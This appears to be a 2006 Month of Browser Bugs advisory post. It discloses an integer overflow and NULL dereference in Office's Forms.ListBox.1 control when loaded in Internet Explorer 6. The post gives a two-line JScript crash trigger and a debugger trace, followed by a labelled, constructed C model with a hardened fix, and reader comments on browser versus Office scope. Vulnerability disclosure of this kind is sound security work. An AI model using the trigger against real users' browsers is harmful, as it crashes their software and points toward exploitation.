Sunday, July 23, 2006

MoBB #24: Forms.ListBox.1 ListWidth

The following bug was tested on the latest version of Internet Explorer 6 on a fully-patched Windows XP SP2 system with the latest version of Office 2003 installed. Setting the ListWidth property of either the Forms.ListBox.1 or the Forms.ComboBox.1 object (both implemented in FM20.DLL, the Microsoft Forms 2.0 library that ships with Office) to 0x7fffffff results in an integer overflow exception, while setting it to 0x7ffffffe triggers a NULL pointer dereference.

// Instantiate the Office Forms 2.0 list box control from script (Forms.ComboBox.1 behaves the same)
var a = new ActiveXObject('Forms.ListBox.1');
a.ListWidth = 0x7ffffffe; // NULL dereference; 0x7fffffff raises an integer overflow exception instead

Demonstration

eax=00000000 ebx=0013b0d8 ecx=00000001
edx=00000052 esi=0013b084 edi=600b115e
eip=60009115 esp=0013b044 ebp=0013b044
FM20!DllGetClassObject+0x6bd5:
60009115 0fb710 movzx edx,word ptr [eax] ds:0023:00000000=????

This bug will be added to the OSVDB:
Microsoft IE Forms Multiple Object ListWidth Property Integer Overflow
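As an added illustration (this is not FM20's code, which is not public, and not part of the original post), the C model below reproduces the two outcomes described above from one unchecked width setter: a checked width+1 cell count raises an overflow error at 0x7fffffff, while at 0x7ffffffe the count still fits in 32 bits but the multi-gigabyte allocation it drives fails, and the returned NULL is used without a check, which is the movzx-from-address-zero pattern in the trace. Everything in it is constructed: the listbox struct, the 16-bit cell layout, the budgeted allocator standing in for a failed allocation (so the demo does not actually try to allocate 4 GB), and the 32767 limit in the hardened setter are assumptions, not details of the real control. The hardened setter rejects out-of-range widths before any arithmetic and treats allocation failure as an error rather than a crash.

```c
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>

/* Outcome codes returned by the two setter variants below. */
enum width_result {
    WIDTH_OK = 0,
    WIDTH_OVERFLOW = 1,    /* arithmetic overflow detected (the 0x7fffffff case) */
    WIDTH_NULL_DEREF = 2,  /* allocator returned NULL and it was used anyway (the 0x7ffffffe case) */
    WIDTH_REJECTED = 3     /* hardened setter refused the value */
};

/* Hypothetical control state: one 16-bit cell per pixel column plus a border cell. */
struct listbox {
    int32_t   list_width;
    uint16_t *cells;
    size_t    cell_count;
};

/* Stand-in allocator (constructed): refuses anything over a fixed budget so the demo
   reproduces a failed multi-gigabyte allocation without exhausting real memory. */
#define ALLOC_BUDGET ((size_t)64 * 1024 * 1024)
static void *budgeted_alloc(size_t bytes)
{
    if (bytes > ALLOC_BUDGET)
        return NULL;
    return calloc(1, bytes);
}

/* Checked 32-bit signed add; returns 0 and leaves *out untouched on overflow. */
static int add_s32_checked(int32_t a, int32_t b, int32_t *out)
{
    if ((b > 0 && a > INT32_MAX - b) || (b < 0 && a < INT32_MIN - b))
        return 0;
    *out = a + b;
    return 1;
}

/* Unsafe setter modelling the observed behaviour: the width+1 cell count is computed with
   an overflow check that throws at INT32_MAX, but the allocation result is never checked. */
enum width_result set_list_width_unsafe(struct listbox *lb, int32_t width)
{
    int32_t cells;
    if (!add_s32_checked(width, 1, &cells))
        return WIDTH_OVERFLOW;     /* 0x7fffffff: the "integer overflow exception" */
    uint16_t *buf = budgeted_alloc((size_t)cells * sizeof(uint16_t));
    if (buf == NULL)
        return WIDTH_NULL_DEREF;   /* 0x7ffffffe: the real code reads word ptr [NULL] here;
                                      the demo returns a code instead of crashing */
    free(lb->cells);
    lb->cells = buf;
    lb->cell_count = (size_t)cells;
    lb->list_width = width;
    return WIDTH_OK;
}

/* Hardened setter: validate the caller-supplied property before it drives any arithmetic. */
#define MAX_LIST_WIDTH 32767       /* constructed bound; use whatever the control can render */
enum width_result set_list_width_safe(struct listbox *lb, int32_t width)
{
    if (width < 0 || width > MAX_LIST_WIDTH)
        return WIDTH_REJECTED;     /* out of range: nothing below can overflow */
    size_t cells = (size_t)width + 1;
    if (cells > SIZE_MAX / sizeof(uint16_t))
        return WIDTH_REJECTED;     /* defensive: byte count must not wrap either */
    uint16_t *buf = budgeted_alloc(cells * sizeof(uint16_t));
    if (buf == NULL)
        return WIDTH_REJECTED;     /* allocation failure is an error, not a crash */
    free(lb->cells);
    lb->cells = buf;
    lb->cell_count = cells;
    lb->list_width = width;
    return WIDTH_OK;
}

int main(void)
{
    struct listbox lb = {0};
    printf("unsafe 0x7fffffff -> %d (expect %d)\n", set_list_width_unsafe(&lb, 0x7fffffff), WIDTH_OVERFLOW);
    printf("unsafe 0x7ffffffe -> %d (expect %d)\n", set_list_width_unsafe(&lb, 0x7ffffffe), WIDTH_NULL_DEREF);
    printf("unsafe 200        -> %d (expect %d)\n", set_list_width_unsafe(&lb, 200), WIDTH_OK);
    printf("safe   0x7ffffffe -> %d (expect %d)\n", set_list_width_safe(&lb, 0x7ffffffe), WIDTH_REJECTED);
    printf("safe   200        -> %d (expect %d)\n", set_list_width_safe(&lb, 200), WIDTH_OK);
    free(lb.cells);
    return 0;
}
```

The two unsafe outcomes come from the same root cause, a property setter that trusts a script-supplied 32-bit value: the INT32_MAX input is only caught because one intermediate happens to be checked, and the INT32_MAX-1 input slips past that check into an unchecked allocation. Bounds-checking the property itself is what closes both paths.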

3 Comments:

At 9:09 AM, Anonymous Anonymous said...

These bugs are interesting and all... but most of them aren't really browser bugs. In this case, Forms.ListBox.1 is owned by Office, thus it's an Office bug. The majority of your ActiveXObject bugs have involved objects that are not part of IE, and most that aren't even part of Windows.

Sure, the easiest attack vector is the browser, but this could just as easily be exploited by a malicious Word document, or running a malicious script with the Windows Scripting Host.

At 9:25 AM, Blogger hdm said...

That is true - the focus of the blog has shifted a bit from specific browser vulnerabilities to any type of attack that can be carried out through a browser. My reasoning for including ActiveX in this case (but not, say, PDF or Flash), is that ActiveX is a core feature of IE and its use has been encouraged in the developer documentation. IE 6 includes a handful of ActiveX controls specifically designed to be used within the browser. If Mozilla's XPCOM stuff was similarly exposed, it would also be a good candidate for this blog. Since ActiveX is such an integral part of the IE browser, not covering these flaws may give the wrong impression about the security of the browser. I see a difference between an ActiveX-based attack on an Office component and forcing the user to load an actual Word document, but I see your point about including non-default components in the MoBB posts.

At 10:50 PM, Anonymous Anonymous said...

What'll be interesting to see, is how many of these ActiveX attacks will have been impossible with IE7, due to ActiveX opt-in.
